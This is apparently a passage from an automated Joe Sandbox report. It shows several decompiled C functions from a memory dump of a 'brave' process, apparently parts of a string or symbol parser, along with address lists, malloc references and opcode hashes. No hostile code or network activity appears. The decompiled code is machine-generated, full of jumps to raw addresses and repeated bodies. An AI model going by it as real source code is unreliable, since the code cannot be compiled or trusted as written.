				if (_t91 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t91 * 8)) = _t162;
				 *(__rbx + 0x38) = _t91 + 1;
				E00007FF67FF652B24DD0();
				_a40 = _t130;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t162 + 3;
				E00007FF67FF652B27F20(_t130, __rbx);
				_t155 = _t130;
				if (_t130 != 0) goto 0x52b26386;
				goto 0x52b25c20;
				asm("o16 nop [eax+eax]");
				_push(0x52dd53e0);
				_push(_t155);
				_push(__rbx);
				_t131 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x52b266c8;
				 *(__rbx + 0x18) =  &(_t131[1]);
				r10d =  *_t131 & 0x000000ff;
				if (sil != 0) goto 0x52b266d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t77 = (r8d >> 0x1f) + r8d >> 1;
				_t113 =  *((intOrPtr*)( *((intOrPtr*)(0x52dd4820 + (_t77 + _t77 * 2) * 8)))) - r10b;
				if (_t113 == 0) goto 0x52b26680;
				if (_t113 <= 0) goto 0x52b266c0;
				r8d = _t77;
				if (0 != r8d) goto 0x52b26648;
				return 0;
			}

0x7ff652b263c0
0x7ff652b263c6
0x7ff652b263dd
0x7ff652b263e1
0x7ff652b263e9
0x7ff652b263ec
0x7ff652b263f2
0x7ff652b263f6
0x7ff652b263ff
0x7ff652b26405
0x7ff652b2641c
0x7ff652b26420
0x7ff652b26428
0x7ff652b2642b
0x7ff652b26431
0x7ff652b26435
0x7ff652b2643e
0x7ff652b26444
0x7ff652b2645b
0x7ff652b2645f
0x7ff652b26467
0x7ff652b2646a
0x7ff652b26470
0x7ff652b26474
0x7ff652b26480
0x7ff652b26485
0x7ff652b26493
0x7ff652b26498
0x7ff652b264a2
0x7ff652b264a8
0x7ff652b264bf
0x7ff652b264c3
0x7ff652b264cb
0x7ff652b264ce
0x7ff652b264d4
0x7ff652b264d8
0x7ff652b264dc
0x7ff652b264eb
0x7ff652b264f0
0x7ff652b264f8
0x7ff652b26501
0x7ff652b26507
0x7ff652b26512
0x7ff652b26517
0x7ff652b2651e
0x7ff652b26522
0x7ff652b26537
0x7ff652b2653c
0x7ff652b26541
0x7ff652b26544
0x7ff652b26550
0x7ff652b26557
0x7ff652b2655e
0x7ff652b2656a
0x7ff652b2656c
0x7ff652b26570
0x7ff652b26575
0x7ff652b2657c
0x7ff652b2657f
0x7ff652b26584
0x7ff652b2658c
0x7ff652b26592
0x7ff652b26598
0x7ff652b265a8
0x7ff652b265b2
0x7ff652b265ba
0x7ff652b265bf
0x7ff652b265d0
0x7ff652b265da
0x7ff652b265de
0x7ff652b265e6
0x7ff652b265ec
0x7ff652b265f2
0x7ff652b265f7
0x7ff652b26600
0x7ff652b26601
0x7ff652b26602
0x7ff652b26607
0x7ff652b26614
0x7ff652b2661e
0x7ff652b26626
0x7ff652b2662d
0x7ff652b26633
0x7ff652b26642
0x7ff652b26656
0x7ff652b26666
0x7ff652b26669
0x7ff652b2666b
0x7ff652b2666d
0x7ff652b26673
0x7ff652b2667e

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 62a82320fdceb24766c0b0c8cff22094254bc4afba2bc82755b66d49ed25b182
Instruction ID: 3438ac1bf01297b953bf0fed52a0788ed73cf8825157062680746149bf717a3c
Opcode Fuzzy Hash: 62a82320fdceb24766c0b0c8cff22094254bc4afba2bc82755b66d49ed25b182
Instruction Fuzzy Hash: AE31F372609B0482E7208F08F89539A77B0FB9479DF284625D2CC5B7A9DFBED584C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B264A2 Relevance: 1.3, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00007FF67FF652B264A2(void* __rbx, signed char* _a40) {
				signed int _t52;
				signed int _t56;
				signed int _t59;
				void* _t78;
				intOrPtr* _t83;
				signed char* _t84;
				signed char* _t86;
				signed char* _t87;
				signed char* _t105;
				signed char* _t106;
				long long _t112;

				_t56 =  *(__rbx + 0x28);
				if (_t56 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52683;
				_t83 = (_t56 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t83 + 4)) = 0;
				 *(__rbx + 0x28) = _t56 + 1;
				 *_t83 = 0x27;
				 *((long long*)(_t83 + 0x10)) = 0x52dd53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x52b25c22;
				E00007FF67FF652B26EE0(_t83, __rbx);
				_a40 = _t83;
				if (_t83 == 0) goto 0x52b25c20;
				if ( *_t83 != 0x18) goto 0x52b25d39;
				goto 0x52b25c22;
				goto 0x52b26051;
				_t84 = _t83 + 1;
				 *(__rbx + 0x18) = _t84;
				E00007FF67FF652B289F0(__rbx);
				E00007FF67FF652B24DD0();
				_a40 = _t84;
				_t105 = _t84;
				goto 0x52b25f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t105[1]);
				E00007FF67FF652B289F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x52b26584;
				 *(__rbx + 0x18) = _t105;
				_t86 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x52b25d30;
				_t112 = _a40;
				if (_t112 == 0) goto 0x52b25c20;
				_t59 =  *(__rbx + 0x38);
				if (_t59 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t59 * 8)) = _t112;
				 *(__rbx + 0x38) = _t59 + 1;
				E00007FF67FF652B24DD0();
				_a40 = _t86;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t112 + 3;
				E00007FF67FF652B27F20(_t86, __rbx);
				_t106 = _t86;
				if (_t86 != 0) goto 0x52b26386;
				goto 0x52b25c20;
				asm("o16 nop [eax+eax]");
				_push(0x52dd53e0);
				_push(_t106);
				_push(__rbx);
				_t87 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x52b266c8;
				 *(__rbx + 0x18) =  &(_t87[1]);
				r10d =  *_t87 & 0x000000ff;
				if (sil != 0) goto 0x52b266d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t52 = (r8d >> 0x1f) + r8d >> 1;
				_t78 =  *((intOrPtr*)( *((intOrPtr*)(0x52dd4820 + (_t52 + _t52 * 2) * 8)))) - r10b;
				if (_t78 == 0) goto 0x52b26680;
				if (_t78 <= 0) goto 0x52b266c0;
				r8d = _t52;
				if (0 != r8d) goto 0x52b26648;
				return 0;
			}

0x7ff652b264a2
0x7ff652b264a8
0x7ff652b264bf
0x7ff652b264c3
0x7ff652b264cb
0x7ff652b264ce
0x7ff652b264d4
0x7ff652b264d8
0x7ff652b264dc
0x7ff652b264eb
0x7ff652b264f0
0x7ff652b264f8
0x7ff652b26501
0x7ff652b26507
0x7ff652b26512
0x7ff652b26517
0x7ff652b2651e
0x7ff652b26522
0x7ff652b26537
0x7ff652b2653c
0x7ff652b26541
0x7ff652b26544
0x7ff652b26550
0x7ff652b26557
0x7ff652b2655e
0x7ff652b2656a
0x7ff652b2656c
0x7ff652b26570
0x7ff652b26575
0x7ff652b2657c
0x7ff652b2657f
0x7ff652b26584
0x7ff652b2658c
0x7ff652b26592
0x7ff652b26598
0x7ff652b265a8
0x7ff652b265b2
0x7ff652b265ba
0x7ff652b265bf
0x7ff652b265d0
0x7ff652b265da
0x7ff652b265de
0x7ff652b265e6
0x7ff652b265ec
0x7ff652b265f2
0x7ff652b265f7
0x7ff652b26600
0x7ff652b26601
0x7ff652b26602
0x7ff652b26607
0x7ff652b26614
0x7ff652b2661e
0x7ff652b26626
0x7ff652b2662d
0x7ff652b26633
0x7ff652b26642
0x7ff652b26656
0x7ff652b26666
0x7ff652b26669
0x7ff652b2666b
0x7ff652b2666d
0x7ff652b26673
0x7ff652b2667e

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: a086c596611ef4ea8cac5059dbacc38b62ed55accf5125814614d9dfe2806d9e
Instruction ID: 6f9e67b952e92c4640859c340f25355bb01810e009479816cd0360f5b6e7d930
Opcode Fuzzy Hash: a086c596611ef4ea8cac5059dbacc38b62ed55accf5125814614d9dfe2806d9e
Instruction Fuzzy Hash: 6F311472609B05C2E7208F08E88539A37B0FB9478DF294625C2CC573A9DFBDD184C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B262C7 Relevance: 1.3, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00007FF67FF652B262C7(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t100;
				signed int _t111;
				signed int _t117;
				signed int _t119;
				signed int _t122;
				signed int _t124;
				signed int _t126;
				signed int _t129;
				signed int _t132;
				void* _t160;
				intOrPtr* _t165;
				intOrPtr* _t168;
				char* _t169;
				signed char* _t170;
				intOrPtr* _t173;
				intOrPtr* _t176;
				signed char* _t179;
				intOrPtr* _t182;
				signed char* _t183;
				signed char* _t185;
				signed char* _t186;
				intOrPtr* _t218;
				signed char* _t219;
				signed char* _t220;
				long long _t229;
				void* _t236;

				_t117 =  *(__rbx + 0x28);
				if (_t117 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526a9;
				_t165 = (_t117 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t165 + 4)) = 0;
				 *(__rbx + 0x28) = _t117 + 1;
				 *_t165 = 0x27;
				 *((long long*)(_t165 + 0x10)) = 0x52dd53c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t119 =  *(__rbx + 0x28);
				if (_t119 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52702;
				_t168 = (_t119 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t168 + 4)) = 0;
				 *(__rbx + 0x28) = _t119 + 1;
				 *_t168 = 0x27;
				 *((long long*)(_t168 + 0x10)) = 0x52dd5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x52b25c22;
				 *_t168 =  *_t168 + __eax;
				_t100 =  *(__rbx + 0x28);
				if (_t100 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b25c20;
				_t218 = (_t100 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t218 + 4)) = 0;
				 *(__rbx + 0x28) = _t100 + 1;
				 *_t218 = 0x42;
				 *((intOrPtr*)(_t218 + 0x10)) = E00007FF67FF652B24E90(_t168, __rbx, __rdx, __r8, _t236);
				_t169 =  *(__rbx + 0x18);
				if ( *_t169 != 0x5f) goto 0x52b25c20;
				_t170 = _t169 + 1;
				 *(__rbx + 0x18) = _t170;
				E00007FF67FF652B25BC0();
				E00007FF67FF652B24DD0();
				_a40 = _t170;
				_t122 =  *(__rbx + 0x28);
				if (_t122 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52670;
				_t173 = (_t122 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t173 + 4)) = 0;
				 *(__rbx + 0x28) = _t122 + 1;
				 *_t173 = 0x27;
				 *((long long*)(_t173 + 0x10)) = 0x52dd5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t124 =  *(__rbx + 0x28);
				if (_t124 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52715;
				_t176 = (_t124 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t176 + 4)) = 0;
				 *(__rbx + 0x28) = _t124 + 1;
				 *_t176 = 0x27;
				 *((long long*)(_t176 + 0x10)) = 0x52dd5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t126 =  *(__rbx + 0x28);
				if (_t126 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526ef;
				_t179 = (_t126 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t179 + 4)) = 0;
				 *(__rbx + 0x28) = _t126 + 1;
				 *_t179 = 0x27;
				 *((long long*)(_t179 + 0x10)) = 0x52dd53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF652B25BC0();
				r9d = 0;
				E00007FF67FF652B24DD0();
				_a40 = _t179;
				_t129 =  *(__rbx + 0x28);
				if (_t129 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52683;
				_t182 = (_t129 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t182 + 4)) = 0;
				 *(__rbx + 0x28) = _t129 + 1;
				 *_t182 = 0x27;
				 *((long long*)(_t182 + 0x10)) = 0x52dd53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x52b25c22;
				E00007FF67FF652B26EE0(_t182, __rbx);
				_a40 = _t182;
				if (_t182 == 0) goto 0x52b25c20;
				if ( *_t182 != 0x18) goto 0x52b25d39;
				goto 0x52b25c22;
				goto 0x52b26051;
				_t183 = _t182 + 1;
				 *(__rbx + 0x18) = _t183;
				E00007FF67FF652B289F0(__rbx);
				E00007FF67FF652B24DD0();
				_a40 = _t183;
				_t219 = _t183;
				goto 0x52b25f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t219[1]);
				E00007FF67FF652B289F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x52b26584;
				 *(__rbx + 0x18) = _t219;
				_t185 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x52b25d30;
				_t229 = _a40;
				if (_t229 == 0) goto 0x52b25c20;
				_t132 =  *(__rbx + 0x38);
				if (_t132 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t132 * 8)) = _t229;
				 *(__rbx + 0x38) = _t132 + 1;
				E00007FF67FF652B24DD0();
				_a40 = _t185;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t229 + 3;
				E00007FF67FF652B27F20(_t185, __rbx);
				_t220 = _t185;
				if (_t185 != 0) goto 0x52b26386;
				goto 0x52b25c20;
				asm("o16 nop [eax+eax]");
				_push(0x52dd53e0);
				_push(_t220);
				_push(__rbx);
				_t186 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x52b266c8;
				 *(__rbx + 0x18) =  &(_t186[1]);
				r10d =  *_t186 & 0x000000ff;
				if (sil != 0) goto 0x52b266d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t111 = (r8d >> 0x1f) + r8d >> 1;
				_t160 =  *((intOrPtr*)( *((intOrPtr*)(0x52dd4820 + (_t111 + _t111 * 2) * 8)))) - r10b;
				if (_t160 == 0) goto 0x52b26680;
				if (_t160 <= 0) goto 0x52b266c0;
				r8d = _t111;
				if (0 != r8d) goto 0x52b26648;
				return 0;
			}

0x7ff652b262c7
0x7ff652b262cd
0x7ff652b262e4
0x7ff652b262e8
0x7ff652b262f0
0x7ff652b262f3
0x7ff652b262f9
0x7ff652b262fd
0x7ff652b26306
0x7ff652b2630c
0x7ff652b26323
0x7ff652b26327
0x7ff652b2632f
0x7ff652b26332
0x7ff652b26338
0x7ff652b2633c
0x7ff652b26340
0x7ff652b2634e
0x7ff652b26350
0x7ff652b26356
0x7ff652b26369
0x7ff652b2636d
0x7ff652b26375
0x7ff652b26378
0x7ff652b26383
0x7ff652b26386
0x7ff652b2638d
0x7ff652b26393
0x7ff652b2639a
0x7ff652b2639e
0x7ff652b263b1
0x7ff652b263b6
0x7ff652b263c0
0x7ff652b263c6
0x7ff652b263dd
0x7ff652b263e1
0x7ff652b263e9
0x7ff652b263ec
0x7ff652b263f2
0x7ff652b263f6
0x7ff652b263ff
0x7ff652b26405
0x7ff652b2641c
0x7ff652b26420
0x7ff652b26428
0x7ff652b2642b
0x7ff652b26431
0x7ff652b26435
0x7ff652b2643e
0x7ff652b26444
0x7ff652b2645b
0x7ff652b2645f
0x7ff652b26467
0x7ff652b2646a
0x7ff652b26470
0x7ff652b26474
0x7ff652b26480
0x7ff652b26485
0x7ff652b26493
0x7ff652b26498
0x7ff652b264a2
0x7ff652b264a8
0x7ff652b264bf
0x7ff652b264c3
0x7ff652b264cb
0x7ff652b264ce
0x7ff652b264d4
0x7ff652b264d8
0x7ff652b264dc
0x7ff652b264eb
0x7ff652b264f0
0x7ff652b264f8
0x7ff652b26501
0x7ff652b26507
0x7ff652b26512
0x7ff652b26517
0x7ff652b2651e
0x7ff652b26522
0x7ff652b26537
0x7ff652b2653c
0x7ff652b26541
0x7ff652b26544
0x7ff652b26550
0x7ff652b26557
0x7ff652b2655e
0x7ff652b2656a
0x7ff652b2656c
0x7ff652b26570
0x7ff652b26575
0x7ff652b2657c
0x7ff652b2657f
0x7ff652b26584
0x7ff652b2658c
0x7ff652b26592
0x7ff652b26598
0x7ff652b265a8
0x7ff652b265b2
0x7ff652b265ba
0x7ff652b265bf
0x7ff652b265d0
0x7ff652b265da
0x7ff652b265de
0x7ff652b265e6
0x7ff652b265ec
0x7ff652b265f2
0x7ff652b265f7
0x7ff652b26600
0x7ff652b26601
0x7ff652b26602
0x7ff652b26607
0x7ff652b26614
0x7ff652b2661e
0x7ff652b26626
0x7ff652b2662d
0x7ff652b26633
0x7ff652b26642
0x7ff652b26656
0x7ff652b26666
0x7ff652b26669
0x7ff652b2666b
0x7ff652b2666d
0x7ff652b26673
0x7ff652b2667e

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0fe0bb664fee0acb066360bbf1dd7b13264afc6f109f4210fc352504dfbd1cf1
Instruction ID: 24de4a89558653f46b0f27fab62778ceca8526b6745fdb372968ea7aba6fd49f
Opcode Fuzzy Hash: 0fe0bb664fee0acb066360bbf1dd7b13264afc6f109f4210fc352504dfbd1cf1
Instruction Fuzzy Hash: 2F21E272A09B05C2E7208F08EC853A937B0FB9474DF295626C2CC573A9DFBDD5848784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B26249 Relevance: 1.3, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00007FF67FF652B26249(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t116;
				signed int _t127;
				signed int _t133;
				signed int _t135;
				signed int _t137;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int _t149;
				signed int _t152;
				void* _t182;
				intOrPtr* _t187;
				intOrPtr* _t190;
				intOrPtr* _t193;
				intOrPtr* _t196;
				char* _t197;
				signed char* _t198;
				intOrPtr* _t201;
				intOrPtr* _t204;
				signed char* _t207;
				intOrPtr* _t210;
				signed char* _t211;
				signed char* _t213;
				signed char* _t214;
				intOrPtr* _t248;
				signed char* _t249;
				signed char* _t250;
				long long _t259;
				void* _t266;

				_t133 =  *(__rbx + 0x28);
				if (_t133 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526c9;
				_t187 = (_t133 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t187 + 4)) = 0;
				 *(__rbx + 0x28) = _t133 + 1;
				 *_t187 = 0x27;
				 *((long long*)(_t187 + 0x10)) = 0x52dd5380;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 4;
				_t135 =  *(__rbx + 0x28);
				if (_t135 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526dc;
				_t190 = (_t135 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t190 + 4)) = 0;
				 *(__rbx + 0x28) = _t135 + 1;
				 *_t190 = 0x27;
				 *((long long*)(_t190 + 0x10)) = 0x52dd5320;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t137 =  *(__rbx + 0x28);
				if (_t137 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526a9;
				_t193 = (_t137 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t193 + 4)) = 0;
				 *(__rbx + 0x28) = _t137 + 1;
				 *_t193 = 0x27;
				 *((long long*)(_t193 + 0x10)) = 0x52dd53c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t139 =  *(__rbx + 0x28);
				if (_t139 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52702;
				_t196 = (_t139 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t196 + 4)) = 0;
				 *(__rbx + 0x28) = _t139 + 1;
				 *_t196 = 0x27;
				 *((long long*)(_t196 + 0x10)) = 0x52dd5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x52b25c22;
				 *_t196 =  *_t196 + __eax;
				_t116 =  *(__rbx + 0x28);
				if (_t116 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b25c20;
				_t248 = (_t116 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t248 + 4)) = 0;
				 *(__rbx + 0x28) = _t116 + 1;
				 *_t248 = 0x42;
				 *((intOrPtr*)(_t248 + 0x10)) = E00007FF67FF652B24E90(_t196, __rbx, __rdx, __r8, _t266);
				_t197 =  *(__rbx + 0x18);
				if ( *_t197 != 0x5f) goto 0x52b25c20;
				_t198 = _t197 + 1;
				 *(__rbx + 0x18) = _t198;
				E00007FF67FF652B25BC0();
				E00007FF67FF652B24DD0();
				_a40 = _t198;
				_t142 =  *(__rbx + 0x28);
				if (_t142 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52670;
				_t201 = (_t142 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t201 + 4)) = 0;
				 *(__rbx + 0x28) = _t142 + 1;
				 *_t201 = 0x27;
				 *((long long*)(_t201 + 0x10)) = 0x52dd5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t144 =  *(__rbx + 0x28);
				if (_t144 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52715;
				_t204 = (_t144 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t204 + 4)) = 0;
				 *(__rbx + 0x28) = _t144 + 1;
				 *_t204 = 0x27;
				 *((long long*)(_t204 + 0x10)) = 0x52dd5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t146 =  *(__rbx + 0x28);
				if (_t146 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526ef;
				_t207 = (_t146 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t207 + 4)) = 0;
				 *(__rbx + 0x28) = _t146 + 1;
				 *_t207 = 0x27;
				 *((long long*)(_t207 + 0x10)) = 0x52dd53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF652B25BC0();
				r9d = 0;
				E00007FF67FF652B24DD0();
				_a40 = _t207;
				_t149 =  *(__rbx + 0x28);
				if (_t149 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52683;
				_t210 = (_t149 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t210 + 4)) = 0;
				 *(__rbx + 0x28) = _t149 + 1;
				 *_t210 = 0x27;
				 *((long long*)(_t210 + 0x10)) = 0x52dd53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x52b25c22;
				E00007FF67FF652B26EE0(_t210, __rbx);
				_a40 = _t210;
				if (_t210 == 0) goto 0x52b25c20;
				if ( *_t210 != 0x18) goto 0x52b25d39;
				goto 0x52b25c22;
				goto 0x52b26051;
				_t211 = _t210 + 1;
				 *(__rbx + 0x18) = _t211;
				E00007FF67FF652B289F0(__rbx);
				E00007FF67FF652B24DD0();
				_a40 = _t211;
				_t249 = _t211;
				goto 0x52b25f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t249[1]);
				E00007FF67FF652B289F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x52b26584;
				 *(__rbx + 0x18) = _t249;
				_t213 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x52b25d30;
				_t259 = _a40;
				if (_t259 == 0) goto 0x52b25c20;
				_t152 =  *(__rbx + 0x38);
				if (_t152 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t152 * 8)) = _t259;
				 *(__rbx + 0x38) = _t152 + 1;
